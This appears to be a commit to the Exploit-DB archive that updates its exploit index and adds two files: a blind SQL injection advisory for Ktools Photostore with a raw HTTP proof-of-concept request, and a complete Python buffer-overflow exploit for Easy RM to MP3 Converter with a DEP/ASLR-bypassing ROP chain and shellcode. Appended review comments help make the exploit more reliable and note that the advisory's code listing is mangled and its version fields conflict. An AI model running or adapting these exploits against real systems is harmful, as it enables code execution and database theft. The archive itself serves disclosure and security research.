DB: 2016-07-01
2 new exploits phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection TFT Gallery <= 0.10 - Password Disclosure Remote Exploit phpBookingCalendar 1.0c - (details_view.php) SQL Injection TFT Gallery 0.10 - Password Disclosure Remote Exploit Seattle Lab Mail 5.5 - POP3 Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow Ktools Photostore 4.7.5 - Blind SQL Injection Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
This commit is contained in:
parent
f74a7dfb7e
commit
0fddce018e
3 changed files with 242 additions and 3 deletions
|
@ -1349,8 +1349,8 @@ id,file,description,date,author,platform,type,port
|
|||
1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0
|
||||
1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0
|
||||
1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0
|
||||
1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0
|
||||
1611,platforms/php/webapps/1611.pl,"TFT Gallery <= 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
|
||||
1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0
|
||||
1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
|
||||
1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0
|
||||
1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
|
||||
1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -14196,7 +14196,7 @@ id,file,description,date,author,platform,type,port
|
|||
16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0
|
||||
16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0
|
||||
16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
|
@ -35864,6 +35864,7 @@ id,file,description,date,author,platform,type,port
|
|||
39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
|
||||
39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
|
||||
39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
|
||||
40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80
|
||||
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
|
||||
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
|
||||
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
|
||||
|
@ -36121,6 +36122,7 @@ id,file,description,date,author,platform,type,port
|
|||
39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
|
||||
39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
|
||||
39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
|
||||
39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
|
||||
39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
|
||||
39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
|
||||
39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
|
||||
|
|
|
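--- a/platforms/php/webapps/40046.txt
+++ b/platforms/php/webapps/40046.txt
@@ -0,0 +1,45 @@
+Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
+CVE-ID : CVE-2016-4337
+Google Dork: inurl:mgr.login.php
+Product : Photostore
+Affected : Versions prior to 4.7.5
+Impact : Critical
+Remote : Yes
+Website link: http://www.ktools.net
+Reported : 02/06/2016
+Authors : Gal Goldshtein and Viktor Minin
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+No authentication (login) is required to exploit this vulnerability.
+The Photostore application password recovery module is prone to a blind sql injection attack.
+An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
+
+
+Vulnerable code is located in the mgr.login.php file:
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+case 'recover_login': {
+mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
+$result = ;
+mysqli_num_rows( $result );
+$returned_rows = ;
+mysqli_fetch_array( $result );
+$db_admin_user = ;
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+PoC:
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
+Host: victim.net
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
+Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 9
+
+email=%27%20[SQL PAYLOAD];#
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+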
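Review bot: The "Vulnerable code" excerpt between the separator lines is mangled: `$result = ;`, `$returned_rows = ;` and `$db_admin_user = ;` have lost their right-hand sides, which appear to be the `mysqli_query(...)`, `mysqli_num_rows(...)` and `mysqli_fetch_array(...)` calls printed on the lines above them, so the listing as committed never shows the single statement that concatenates `$_POST['email']` into the query. The version fields also disagree with each other: the title says `<= 4.7.5`, the `Affected` line says `Versions prior to 4.7.5`, and the files.csv entry records `4.7.5`; one of them should be corrected so the version a defender has to be on to be safe is unambiguous. A remediation line after the impact statement would round out the advisory, e.g. `Fix : bind the email value with a prepared statement (mysqli_prepare/mysqli_stmt_bind_param) instead of string concatenation`.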
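--- a/platforms/windows/local/39933.py
+++ b/platforms/windows/local/39933.py
@@ -0,0 +1,192 @@
+# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
+# Date: 2016-06-12
+# Exploit Author: Csaba Fitzl
+# Vendor Homepage: N/A
+# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
+# Version: 2.7.3.700
+# Tested on: Windows 7 x64
+# CVE : CVE-2009-1330
+
+import struct
+
+def create_rop_chain():
+
+    # rop chain generated with mona.py - www.corelan.be
+    # added missing parts, and some optimisation by Csaba Fitzl
+    rop_gadgets = [
+
+        #mov 1000 to EDX - Csaba
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+        0x10025a1c, # XOR EDX,EDX # RETN
+        0x1002bc3d, # MOV EAX,411 # RETN
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc24, # ADD EAX,80 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1002dc41, # ADD EAX,40 # POP EBP # RETN
+        0x41414141, # Filler (compensate)
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x10023327, # INC EAX # RETN
+        0x10023327, # INC EAX # RETN
+        0x10023327, # INC EAX # RETN
+        # AT this point EAX = 0x1000
+        0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+        0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
+        0x41414141, # Filler (compensate)
+
+
+        0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
+        0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
+        0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
+
+        0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+        0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
+        0x1001b058, # & push esp # ret [MSRMfilter03.dll]
+        0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
+        0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
+        0x1001d2ac, # ADD EAX,4 # RETN
+        0x10023327, # INC EAX # RETN
+        0x10023327, # INC EAX # RETN
+        0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
+        0x41414141, # Filler (compensate)
+        0x41414141, # Filler (compensate)
+
+        0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
+        0xffffffff, #
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
+        0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
+        0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
+        0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
+        0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
+        0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
+
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+buffersize = 26090
+
+junk = "A" * buffersize
+
+eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
+
+rop = create_rop_chain()
+
+calc = (
+    "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
+    "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
+    "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
+    "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
+    "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
+    "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
+
+
+shell = "\x90"*0x10 + calc
+
+exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
+
+filename = "list.m3u"
+textfile = open(filename , 'w')
+textfile.write(exploit)
+textfile.close()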
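Review bot: The output file is opened in text mode at `textfile = open(filename , 'w')` and closed by hand rather than by a context manager; in text mode on Windows any 0x0A byte in the written data is rewritten as 0x0D 0x0A, and while none of the packed gadget values or string-literal bytes visible here happen to contain 0x0A, a binary write with deterministic cleanup is the robust form: `with open(filename, 'wb') as textfile:` / `    textfile.write(exploit)`. The `''.join(struct.pack('<I', _) for _ in rop_gadgets)` return in create_rop_chain and the `str` concatenation in `exploit = junk + eip + rop + shell + ...` mix `str` and `struct.pack` output, which only works under Python 2, so the header should record the interpreter version next to `# Tested on: Windows 7 x64`. The indentation of the function body and list entries was lost in the rendered view and is restored conventionally here; the committed file's actual indentation should be confirmed.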